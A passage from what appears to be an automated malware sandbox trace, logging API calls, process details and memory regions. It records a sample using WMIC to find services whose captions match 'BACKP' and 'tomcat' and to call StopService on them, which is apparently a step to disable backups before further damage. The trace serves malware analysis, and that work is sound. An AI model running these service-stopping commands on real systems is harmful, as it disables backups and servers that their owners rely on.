lFlags=0, pVal=0xb2f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.563] lstrlenW (lpString="StopService") returned 11 [0109.563] lstrlenW (lpString="StopService") returned 11 [0109.563] IUnknown:Release (This=0xbd7240) returned 0x1 [0109.563] IUnknown:Release (This=0xbd5348) returned 0x0 [0109.564] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.564] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.564] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.564] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc19b4536 | out: _String="Select", _Context=0xc19b4536) returned="Select" [0109.564] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b4536 | out: _String=0x0, _Context=0xc19b4536) returned="*" [0109.564] lstrlenW (lpString="FROM") returned 4 [0109.564] lstrlenW (lpString="*") returned 1 [0109.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0109.564] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b4536 | out: _String=0x0, _Context=0xc19b4536) returned="from" [0109.564] lstrlenW (lpString="FROM") returned 4 [0109.564] lstrlenW (lpString="from") returned 4 [0109.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0109.564] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b4536 | out: _String=0x0, _Context=0xc19b4536) returned="Win32_Service" [0109.564] lstrlenW (lpString="SET") returned 3 [0109.564] lstrlenW (lpString="CALL") returned 4 [0109.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0109.564] lstrlenW (lpString="CREATE") returned 6 [0109.564] lstrlenW (lpString="CALL") returned 4 [0109.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0109.565] lstrlenW (lpString="GET") returned 3 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0109.565] lstrlenW (lpString="LIST") returned 4 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0109.565] lstrlenW (lpString="ASSOC") returned 5 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0109.565] WbemLocator:IUnknown:AddRef (This=0xb86c10) returned 0x3 [0109.565] lstrlenW (lpString="") returned 0 [0109.565] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0109.565] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.565] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.565] GetCurrentThreadId () returned 0xdc4 [0109.565] GetCurrentProcess () returned 0xffffffff [0109.565] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xb2fbcc | out: TokenHandle=0xb2fbcc*=0x270) returned 1 [0109.565] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb2fbc8 | out: TokenInformation=0x0, ReturnLength=0xb2fbc8) returned 0 [0109.565] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0xca8bb8, TokenInformationLength=0x118, ReturnLength=0xb2fbc8 | out: TokenInformation=0xca8bb8, ReturnLength=0xb2fbc8) returned 1 [0109.565] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0xca8bb8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0109.565] CloseHandle (hObject=0x270) returned 1 [0109.565] lstrlenW (lpString="GET") returned 3 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0109.565] lstrlenW (lpString="LIST") returned 4 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0109.565] lstrlenW (lpString="SET") returned 3 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] lstrlenW (lpString="CALL") returned 4 [0109.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0109.565] ??0CHString@@QAE@XZ () returned 0xb2fb8c [0109.565] GetCurrentThreadId () returned 0xdc4 [0109.566] SysStringLen (param_1="\\\\") returned 0x2 [0109.566] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0109.566] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0109.566] SysStringLen (param_1="\\") returned 0x1 [0109.566] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0109.566] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0109.566] WbemLocator:IWbemLocator:ConnectServer (in: This=0xb86c10, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xbb0668) returned 0x0 [0109.572] CoSetProxyBlanket (pProxy=0xbb0668, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0109.572] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.572] ??0CHString@@QAE@XZ () returned 0xb2fb88 [0109.572] GetCurrentThreadId () returned 0xdc4 [0109.572] lstrlenA (lpString="") returned 0 [0109.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xca8b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.572] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.572] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.573] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc19b448a | out: _String="Select", _Context=0xc19b448a) returned="Select" [0109.573] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b448a | out: _String=0x0, _Context=0xc19b448a) returned="*" [0109.573] lstrlenW (lpString="FROM") returned 4 [0109.573] lstrlenW (lpString="*") returned 1 [0109.573] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0109.573] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b448a | out: _String=0x0, _Context=0xc19b448a) returned="from" [0109.573] lstrlenW (lpString="FROM") returned 4 [0109.573] lstrlenW (lpString="from") returned 4 [0109.573] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0109.573] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b448a | out: _String=0x0, _Context=0xc19b448a) returned="Win32_Service" [0109.573] IWbemServices:GetObject (in: This=0xbb0668, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xb2fb60*=0x0, ppCallResult=0x0 | out: ppObject=0xb2fb60*=0xbd5af8, ppCallResult=0x0) returned 0x0 [0109.603] IWbemClassObject:GetMethod (in: This=0xbd5af8, wszName="STOPSERVICE", lFlags=0, ppInSignature=0xb2fb6c, ppOutSignature=0xb2fb58 | out: ppInSignature=0xb2fb6c*=0x0, ppOutSignature=0xb2fb58*=0xbd5e78) returned 0x0 [0109.603] IUnknown:Release (This=0xbd5e78) returned 0x0 [0109.603] IUnknown:Release (This=0xbd5af8) returned 0x0 [0109.603] ??0CHString@@QAE@XZ () returned 0xb2fa38 [0109.603] GetCurrentThreadId () returned 0xdc4 [0109.603] lstrlenA (lpString="") returned 0 [0109.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xca8b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.603] lstrlenA (lpString="") returned 0 [0109.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xca8b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.603] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.603] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.604] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc19b4712 | out: _String="Select", _Context=0xc19b4712) returned="Select" [0109.604] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b4712 | out: _String=0x0, _Context=0xc19b4712) returned="*" [0109.604] lstrlenW (lpString="FROM") returned 4 [0109.604] lstrlenW (lpString="*") returned 1 [0109.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0109.604] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b4712 | out: _String=0x0, _Context=0xc19b4712) returned="from" [0109.604] lstrlenW (lpString="FROM") returned 4 [0109.604] lstrlenW (lpString="from") returned 4 [0109.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0109.604] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc19b4712 | out: _String=0x0, _Context=0xc19b4712) returned="Win32_Service" [0109.604] lstrlenA (lpString="SELECT * FROM ") returned 14 [0109.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0xca9000, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0109.604] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0109.604] SysStringLen (param_1="Win32_Service") returned 0xd [0109.604] lstrlenA (lpString=" WHERE ") returned 7 [0109.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0xca8d68, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0109.604] SysStringLen (param_1=" WHERE ") returned 0x7 [0109.604] SysStringLen (param_1="caption LIKE '%BACKP%'") returned 0x16 [0109.604] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0109.604] SysStringLen (param_1=" WHERE caption LIKE '%BACKP%'") returned 0x1d [0109.605] IWbemServices:ExecQuery (in: This=0xbb0668, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%BACKP%'", lFlags=48, pCtx=0x0, ppEnum=0xb2fa40 | out: ppEnum=0xb2fa40*=0xbd5ea0) returned 0x0 [0109.621] CoSetProxyBlanket (pProxy=0xbd5ea0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0109.669] IEnumWbemClassObject:Next (in: This=0xbd5ea0, lTimeout=-1, uCount=0x1, apObjects=0xb2fa44, puReturned=0xb2fa30 | out: apObjects=0xb2fa44*=0x0, puReturned=0xb2fa30*=0x0) returned 0x1 [0110.143] IUnknown:Release (This=0xbd5ea0) returned 0x0 [0110.145] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.145] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.145] GetCurrentThreadId () returned 0xdc4 [0110.145] ??0CHString@@QAE@PBG@Z () returned 0xb2fbfc [0110.145] ??YCHString@@QAEABV0@PBG@Z () returned 0xb2fbfc [0110.145] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0xca9060, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0110.146] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0110.146] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0xca8a98, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0110.146] __iob_func () returned 0x77ac1208 [0110.146] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0110.146] __iob_func () returned 0x77ac1208 [0110.146] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0110.146] ??1CHString@@QAE@XZ () returned 0x1 [0110.146] IUnknown:Release (This=0xbb0668) returned 0x0 [0110.147] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0110.147] _kbhit () returned 0x0 [0110.147] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0110.148] WbemLocator:IUnknown:Release (This=0xb86c10) returned 0x2 [0110.148] IUnknown:Release (This=0xbb0b18) returned 0x0 [0110.148] IUnknown:Release (This=0xbb0988) returned 0x0 [0110.148] WbemLocator:IUnknown:Release (This=0xb86c10) returned 0x1 [0110.148] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0110.148] WbemLocator:IUnknown:Release (This=0xb86c10) returned 0x0 [0110.150] CoUninitialize () [0110.163] exit (_Code=0) [0110.164] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.164] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 198 os_tid = 0xdc8 Thread: id = 199 os_tid = 0xdcc Thread: id = 200 os_tid = 0xdd0 Thread: id = 201 os_tid = 0xdd4 Process: id = "40" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4383b000" os_pid = "0xddc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2658 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2659 start_va = 0x9f0000 end_va = 0x49effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 2660 start_va = 0x49f0000 end_va = 0x4a0ffff entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 2661 start_va = 0x4a10000 end_va = 0x4a11fff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 2662 start_va = 0x4a20000 end_va = 0x4a33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 2663 start_va = 0x4a40000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 2664 start_va = 0x4a80000 end_va = 0x4b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 2665 start_va = 0x4b80000 end_va = 0x4b83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b80000" filename = "" Region: id = 2666 start_va = 0x4b90000 end_va = 0x4b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 2667 start_va = 0x4ba0000 end_va = 0x4ba1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 2668 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2669 start_va = 0x7f0b0000 end_va = 0x7f0d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0b0000" filename = "" Region: id = 2670 start_va = 0x7f0d9000 end_va = 0x7f0d9fff entry_point = 0x0 region_type = private name = "private_0x000000007f0d9000" filename = "" Region: id = 2671 start_va = 0x7f0db000 end_va = 0x7f0dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f0db000" filename = "" Region: id = 2672 start_va = 0x7f0dd000 end_va = 0x7f0dffff entry_point = 0x0 region_type = private name = "private_0x000000007f0dd000" filename = "" Region: id = 2673 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2674 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2675 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2676 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2677 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2678 start_va = 0x4cc0000 end_va = 0x4ccffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 2679 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2680 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2681 start_va = 0x4bc0000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 2682 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2723 start_va = 0x49f0000 end_va = 0x49fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 2724 start_va = 0x4cd0000 end_va = 0x4d8dfff entry_point = 0x4cd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2725 start_va = 0x4d90000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 2726 start_va = 0x4dd0000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 2727 start_va = 0x5070000 end_va = 0x507ffff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 2728 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2729 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2730 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2731 start_va = 0x7efb0000 end_va = 0x7f0affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2732 start_va = 0x7f0d6000 end_va = 0x7f0d8fff entry_point = 0x0 region_type = private name = "private_0x000000007f0d6000" filename = "" Region: id = 2733 start_va = 0x4a00000 end_va = 0x4a03fff entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 2734 start_va = 0x4a10000 end_va = 0x4a13fff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 2735 start_va = 0x5080000 end_va = 0x53b6fff entry_point = 0x5080000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 203 os_tid = 0xde0 [0110.324] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0110.324] __set_app_type (_Type=0x1) [0110.324] __p__fmode () returned 0x77ac4d6c [0110.324] __p__commode () returned 0x77ac5b1c [0110.324] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0110.324] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0110.324] GetCurrentThreadId () returned 0xde0 [0110.324] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde0) returned 0x84 [0110.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0110.325] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0110.325] SetThreadUILanguage (LangId=0x0) returned 0x409 [0110.327] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.327] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4b7fcd4 | out: phkResult=0x4b7fcd4*=0x0) returned 0x2 [0110.328] VirtualQuery (in: lpAddress=0x4b7fcdb, lpBuffer=0x4b7fc8c, dwLength=0x1c | out: lpBuffer=0x4b7fc8c*(BaseAddress=0x4b7f000, AllocationBase=0x4a80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0110.328] VirtualQuery (in: lpAddress=0x4a80000, lpBuffer=0x4b7fc8c, dwLength=0x1c | out: lpBuffer=0x4b7fc8c*(BaseAddress=0x4a80000, AllocationBase=0x4a80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0110.328] VirtualQuery (in: lpAddress=0x4a81000, lpBuffer=0x4b7fc8c, dwLength=0x1c | out: lpBuffer=0x4b7fc8c*(BaseAddress=0x4a81000, AllocationBase=0x4a80000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0110.328] VirtualQuery (in: lpAddress=0x4a83000, lpBuffer=0x4b7fc8c, dwLength=0x1c | out: lpBuffer=0x4b7fc8c*(BaseAddress=0x4a83000, AllocationBase=0x4a80000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0110.328] VirtualQuery (in: lpAddress=0x4b80000, lpBuffer=0x4b7fc8c, dwLength=0x1c | out: lpBuffer=0x4b7fc8c*(BaseAddress=0x4b80000, AllocationBase=0x4b80000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0110.328] GetConsoleOutputCP () returned 0x1b5 [0110.328] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0110.328] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0110.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0110.328] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0110.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0110.328] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0110.329] _get_osfhandle (_FileHandle=1) returned 0x3c [0110.329] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0110.329] _get_osfhandle (_FileHandle=0) returned 0x38 [0110.329] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0110.329] _get_osfhandle (_FileHandle=0) returned 0x38 [0110.329] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0110.329] GetEnvironmentStringsW () returned 0x4bc7dd8* [0110.329] FreeEnvironmentStringsA (penv="A") returned 1 [0110.329] GetEnvironmentStringsW () returned 0x4bc7dd8* [0110.330] FreeEnvironmentStringsA (penv="A") returned 1 [0110.330] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4b7ec38 | out: phkResult=0x4b7ec38*=0x94) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x0, lpData=0x4b7ec44*=0x18, lpcbData=0x4b7ec40*=0x1000) returned 0x2 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x1, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 